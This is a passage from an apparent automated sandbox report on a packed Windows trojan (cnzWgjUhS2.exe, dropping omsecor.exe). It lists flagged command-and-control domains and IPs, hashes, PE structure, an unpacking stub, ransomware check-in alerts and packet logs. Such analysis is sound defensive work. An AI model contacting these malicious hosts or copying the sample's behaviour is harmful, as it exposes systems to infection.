          ow5dirasuek.com | 52.34.198.229 | true | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          http://mkkuei4kdsz.com/ | true | Avira URL Cloud: phishing | unknown
          http://lousta.net/161/343.html | true | Avira URL Cloud: phishing | unknown
          http://ow5dirasuek.com/968/405.html | true | Avira URL Cloud: phishing | unknown
          http://mkkuei4kdsz.com/100/325.html | true | Avira URL Cloud: phishing | unknown
          http://lousta.net/895/196.html | true | Avira URL Cloud: phishing | unknown
          http://lousta.net/601/938.html | true | Avira URL Cloud: phishing | unknown
          http://lousta.net/976/76.html | true | Avira URL Cloud: phishing | unknown
          http://lousta.net/303/619.html | true | Avira URL Cloud: phishing | unknown
          http://mkkuei4kdsz.com/130/71.html | true | Avira URL Cloud: phishing | unknown
          http://lousta.net/ | true | Avira URL Cloud: phishing | unknown
          http://ow5dirasuek.com/59/409.html | true | Avira URL Cloud: phishing | unknown
          http://lousta.net/347/423.html | true | Avira URL Cloud: phishing | unknown
          http://lousta.net/467/386.html | true | Avira URL Cloud: phishing | unknown
          http://ow5dirasuek.com/179/569.html | true | Avira URL Cloud: phishing | unknown
          http://ow5dirasuek.com/ | true | Avira URL Cloud: phishing | unknown
          http://mkkuei4kdsz.com/88/221.html | true | Avira URL Cloud: phishing | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          https://nojs.domaincntrol.com | omsecor.exe, 00000001.00000002.1986796301.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879755700.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://mkkuei4kdsz.com/130/71.htmlcrosoft | omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          http://ow5dirasuek.com/179/569.htmlQZ | omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          http://mkkuei4kdsz.com/100/325.html)L | omsecor.exe, 00000001.00000002.1987110192.0000000000628000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          http://ow5dirasuek.com/179/569.html; | omsecor.exe, 00000001.00000002.1986796301.0000000000194000.00000004.00000010.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          http://lousta.net/161/343.htmll | omsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          http://lousta.net/895/196.html# | omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
          http://mkkuei4kdsz.com/y | omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
          http://ow5dirasuek.com/179/569.html3 | omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
          http://ow5dirasuek.com/968/405.htmlp | omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing |
                unknown
                http://mkkuei4kdsz.com/130/71.htmlr&&omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                https://domaincntrol.com/?orighost=omsecor.exe, 00000001.00000002.1986796301.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879755700.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://lousta.net/347/423.htmlt?E&omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.htmlzomsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.htmleZomsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.htmliZ#omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.htmlP&omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.html$omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.html(omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/303/619.html=omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.html&omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/467/386.htmlQ=omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/161/343.html=omsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/59/409.htmlk7omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.htmliomsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/976/76.htmlmswsock.dll.muiomsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/347/423.html(omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/88/221.htmlVomsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.htmlGUomsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/&Xomsecor.exe, 00000008.00000002.2986475132.000000000059E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/895/196.html_omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/161/343.htmleomsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/303/619.htmlEcomsecor.exe, 00000001.00000002.1987110192.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/100/325.html7omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodconcnzWgjUhS2.exe, 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, omsecor.exe, 00000001.00000002.1986846567.0000000000401000.00000040.00000001.01000000.00000004.sdmp, omsecor.exe, 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, omsecor.exe, 00000008.00000002.2986278876.0000000000401000.00000040.00000001.01000000.00000007.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.html;omsecor.exe, 00000005.00000002.2879755700.0000000000194000.00000004.00000010.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/179/569.htmloZomsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/59/409.html(&Z&omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/601/938.htmlshqos.dll.muiomsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                unknown
                http://lousta.net/161/343.htmlTomsecor.exe, 00000008.00000002.2986475132.000000000059A000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://mkkuei4kdsz.com/en-GBomsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.htmlasuek.com5omsecor.exe, 00000005.00000002.2879968541.000000000062E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://ow5dirasuek.com/968/405.htmlNomsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
64.225.91.73 | mkkuei4kdsz.com | United States | 14061 | DIGITALOCEAN-ASNUS | true
193.166.255.171 | lousta.net | Finland | 1741 | FUNETASFI | true
52.34.198.229 | ow5dirasuek.com | United States | 16509 | AMAZON-02US | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1506967
Start date and time: 2024-09-08 06:08:39 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winEXE@7/3@3/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 23
• Number of non-executed functions: 111
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big: too many NtQueryValueKey calls found
• VT rate limit hit for: cnzWgjUhS2.exe
Time | Type | Description
00:09:37 | API Interceptor | 12x Sleep call for process: omsecor.exe modified
Process: C:\Users\user\Desktop\cnzWgjUhS2.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category: dropped
Size (bytes): 36600
Entropy (8bit): 7.811358055923133
Encrypted: false
SSDEEP: 768:U6vjVmakOElpmAsUA7DJHrhto2OsgwAPTUrpiEe7HpB:j8Z0kA7FHlO2OwOTUtKjpB
MD5: BA4DF80E161C9C58860725AAC02D99E4
SHA1: CC5247AFD1FAA023B04FA163769FCED8A4FACC67
SHA-256: 6F0DB674782A337AAC17C77772BC71E2C1D992E87EBB6174A7732F2A28F7BB2D
SHA-512: 6B02356AB380850E358B3A22DEAA9B2F842EFE426236CB4BBBAB50CD05151B46C79889618B8E00B8019678890B0A5C694C92B7A017C370644A93AF007CD6CD86
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
Process: C:\Windows\SysWOW64\omsecor.exe
File Type: data
Category: dropped
Size (bytes): 100
Entropy (8bit): 1.8626376367274078
Encrypted: false
SSDEEP: 3:gtqyuCbFtdkdmdf8fd9:gwDvdmdf83
MD5: B45EBCFDAB51CE8D00E87D3018E77ADC
SHA1: 0C57AF7B6BF68E96EE0FD9B20A29280BB3E0C81F
SHA-256: 9B94ED408D47A530A9B337933258C2B872C94734919BF03732DF4D809D3DD2B1
SHA-512: 98882CDEFD148443EDA5FABC7B88EAB941FB0D16D5BCE74DEEC105B381EC16A1A65709449AB186D40C408914B704CC61EB4C3A2998B672B19F420A9B89109046
Malicious: false
Reputation: low
Process: C:\Users\user\AppData\Roaming\omsecor.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category: dropped
Size (bytes): 36600
Entropy (8bit): 7.811365297306151
Encrypted: false
SSDEEP: 768:W6vjVmakOElpmAsUA7DJHrhto2OsgwAPTUrpiEe7HpB:t8Z0kA7FHlO2OwOTUtKjpB
MD5: 9AF480E9873460DD811C495A948A78AE
SHA1: 52F194026A2EC41FCA1738E6911EEA5298712635
SHA-256: CC43372B26504DB80D8A12CF0F906672972F0D3DC9B3959351D31DCA562231B5
SHA-512: B05662E32B6075188278B21388F98C1661ECBD19012E363984F5B92B01E0F32B983C0E30E1A8CA74D14039913C99F0615BCBA51F8F71E9E2A8DCDEAA3A1ABF59
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit): 7.811340093455825
TrID:
• Win32 Executable (generic) a (10002005/4) 99.66%
• UPX compressed Win32 Executable (30571/9) 0.30%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: cnzWgjUhS2.exe
File size: 36'600 bytes
MD5: 10b089f41384787f77a9de73a9c55e4b
SHA1: b5cd02bedf0c963c95b17937f334b4eb950a22ed
SHA256: ce28f0ea14877935233268bb240e0aa2013eb133a179fee671144939539fdc7a
SHA512: 22767b0b9a9ca2bddc6fbcb06f1d50293a425cb7cb701b797b4612824928dbf85ee808d9fdccd7ab489dd87c3693c310f917b8565d21c0b8067cfb32a233b9cd
SSDEEP: 768:k6vjVmakOElpmAsUA7DJHrhto2OsgwAPTUrpiEe7HpB:z8Z0kA7FHlO2OwOTUtKjpB
TLSH: 95F2F19F18015ECACB95593027A29B0D2F6E7D905B1DB3C21A9E307C74D35EAF670B08
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x42b560
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp: 0x50B2D8C7 [Mon Nov 26 02:49:43 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: ca90886d8faeb004fd43054d3e6673d8
                Instruction
                pushad
                mov esi, 00423000h
                lea edi, dword ptr [esi-00022000h]
                push edi
                jmp 00007FEF38EDD95Dh
                nop
                mov al, byte ptr [esi]
                inc esi
                mov byte ptr [edi], al
                inc edi
                add ebx, ebx
                jne 00007FEF38EDD959h
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                jc 00007FEF38EDD93Fh
                mov eax, 00000001h
                add ebx, ebx
                jne 00007FEF38EDD959h
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                adc eax, eax
                add ebx, ebx
                jnc 00007FEF38EDD941h
                jne 00007FEF38EDD95Bh
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                jnc 00007FEF38EDD936h
                xor ecx, ecx
                sub eax, 03h
                jc 00007FEF38EDD95Fh
                shl eax, 08h
                mov al, byte ptr [esi]
                inc esi
                xor eax, FFFFFFFFh
                je 00007FEF38EDD9C6h
                mov ebp, eax
                add ebx, ebx
                jne 00007FEF38EDD959h
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                adc ecx, ecx
                add ebx, ebx
                jne 00007FEF38EDD959h
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                adc ecx, ecx
                jne 00007FEF38EDD972h
                inc ecx
                add ebx, ebx
                jne 00007FEF38EDD959h
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                adc ecx, ecx
                add ebx, ebx
                jnc 00007FEF38EDD941h
                jne 00007FEF38EDD95Bh
                mov ebx, dword ptr [esi]
                sub esi, FFFFFFFCh
                adc ebx, ebx
                jnc 00007FEF38EDD936h
                add ecx, 02h
                cmp ebp, FFFFF300h
                adc ecx, 01h
                lea edx, dword ptr [edi+ebp]
                cmp ebp, FFFFFFFCh
                jbe 00007FEF38EDD961h
                mov al, byte ptr [edx]
                inc edx
                mov byte ptr [edi], al
                inc edi
                dec ecx
                jne 00007FEF38EDD949h
                jmp 00007FEF38EDD8B8h
                nop
                mov eax, dword ptr [edx]
                add edx, 04h
                mov dword ptr [edi], eax
                add edi, 04h
                sub ecx, 04h
                jnbe 00007FEF38EDD943h
                add edi, ecx
                jmp 00007FEF38EED8A1h
                Programming Language:
                • [ASM] VS2005 build 50727
                • [ C ] VS2005 build 50727
                • [LNK] VS2005 build 50727
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2c000 | 0x1f0 | UPX2
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2b6c0 | 0x48 | UPX1
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                UPX0 | 0x1000 | 0x22000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                UPX1 | 0x23000 | 0x9000 | 0x8800 | 0a37ff92c9244f27273c00df63b5aeed | False | 0.98779296875 | data | 7.909688451472698 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                UPX2 | 0x2c000 | 0x1000 | 0x200 | f7ad827edeffa7b703cdfd6c8aa7c086 | False | 0.544921875 | data | 3.9687619393335836 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                ADVAPI32.dll | RegCloseKey
                KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                ole32.dll | CoInitialize
                OLEAUT32.dll | VariantClear
                SHELL32.dll | SHGetFolderPathW
                SHLWAPI.dll | StrStrIW
                USER32.dll | SetParent
                WININET.dll | InternetOpenW
                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                2024-09-08T06:09:37.850228+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49749 | 193.166.255.171 | 80 | TCP
                2024-09-08T06:09:37.868813+0200 | 2016998 | ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) | 1 | 192.168.2.4 | 49730 | 193.166.255.171 | 80 | TCP
                2024-09-08T06:09:38.569119+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49730 | 193.166.255.171 | 80 | TCP
                2024-09-08T06:10:00.064197+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49731 | 193.166.255.171 | 80 | TCP
                2024-09-08T06:10:00.848191+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49738 | 64.225.91.73 | 80 | TCP
                2024-09-08T06:10:01.919056+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49739 | 52.34.198.229 | 80 | TCP
                2024-09-08T06:10:01.919142+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 52.34.198.229 | 80 | 192.168.2.4 | 49739 | TCP
                2024-09-08T06:10:01.919142+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 52.34.198.229 | 80 | 192.168.2.4 | 49739 | TCP
                2024-09-08T06:10:23.623919+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49740 | 193.166.255.171 | 80 | TCP
                2024-09-08T06:10:45.111484+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49741 | 193.166.255.171 | 80 | TCP
                2024-09-08T06:10:45.834962+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49743 | 64.225.91.73 | 80 | TCP
                2024-09-08T06:10:46.699343+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49744 | 52.34.198.229 | 80 | TCP
                2024-09-08T06:11:08.188034+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49745 | 193.166.255.171 | 80 | TCP
                2024-09-08T06:11:29.708209+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49746 | 193.166.255.171 | 80 | TCP
                2024-09-08T06:11:30.431154+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49747 | 64.225.91.73 | 80 | TCP
                2024-09-08T06:11:31.264187+0200 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.4 | 49748 | 52.34.198.229 | 80 | TCP
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Sep 8, 2024 06:09:37.868813038 CEST | 49730 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:09:37.873640060 CEST | 80 | 49730 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:09:37.873740911 CEST | 49730 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:09:37.874025106 CEST | 49730 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:09:37.878842115 CEST | 80 | 49730 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:09:38.568983078 CEST | 80 | 49730 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:09:38.569118977 CEST | 49730 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:09:38.569185972 CEST | 49730 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:09:38.573942900 CEST | 80 | 49730 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:09:38.678809881 CEST | 49731 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:09:38.683886051 CEST | 80 | 49731 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:09:38.683988094 CEST | 49731 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:09:38.684099913 CEST | 49731 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:09:38.688827038 CEST | 80 | 49731 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:10:00.064033985 CEST | 80 | 49731 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:10:00.064197063 CEST | 49731 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:00.064429045 CEST | 49731 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:00.069154024 CEST | 80 | 49731 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:10:00.228801966 CEST | 49738 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:10:00.233632088 CEST | 80 | 49738 | 64.225.91.73 | 192.168.2.4
                Sep 8, 2024 06:10:00.233724117 CEST | 49738 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:10:00.233843088 CEST | 49738 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:10:00.238615990 CEST | 80 | 49738 | 64.225.91.73 | 192.168.2.4
                Sep 8, 2024 06:10:00.848057985 CEST | 80 | 49738 | 64.225.91.73 | 192.168.2.4
                Sep 8, 2024 06:10:00.848191023 CEST | 49738 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:10:01.176980019 CEST | 49739 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:10:01.181814909 CEST | 80 | 49739 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:10:01.181921959 CEST | 49739 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:10:01.182065964 CEST | 49739 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:10:01.186829090 CEST | 80 | 49739 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:10:01.918982983 CEST | 80 | 49739 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:10:01.919055939 CEST | 49739 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:10:01.919142008 CEST | 80 | 49739 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:10:01.919186115 CEST | 49739 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:10:01.922857046 CEST | 49739 | 80 | 192.168.2.4 | 52.34.198.229
                Sep 8, 2024 06:10:01.927676916 CEST | 80 | 49739 | 52.34.198.229 | 192.168.2.4
                Sep 8, 2024 06:10:02.237103939 CEST | 49738 | 80 | 192.168.2.4 | 64.225.91.73
                Sep 8, 2024 06:10:02.237821102 CEST | 49740 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:02.242651939 CEST | 80 | 49740 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:10:02.242733002 CEST | 49740 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:02.242902994 CEST | 49740 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:02.247637033 CEST | 80 | 49740 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:10:23.623823881 CEST | 80 | 49740 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:10:23.623919010 CEST | 49740 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:23.624063969 CEST | 49740 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:23.628832102 CEST | 80 | 49740 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:10:23.741519928 CEST | 49741 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:23.746465921 CEST | 80 | 49741 | 193.166.255.171 | 192.168.2.4
                Sep 8, 2024 06:10:23.746572018 CEST | 49741 | 80 | 192.168.2.4 | 193.166.255.171
                Sep 8, 2024 06:10:23.746695995 CEST | 49741 | 80 | 192.168.2.4 | 193.166.255.171
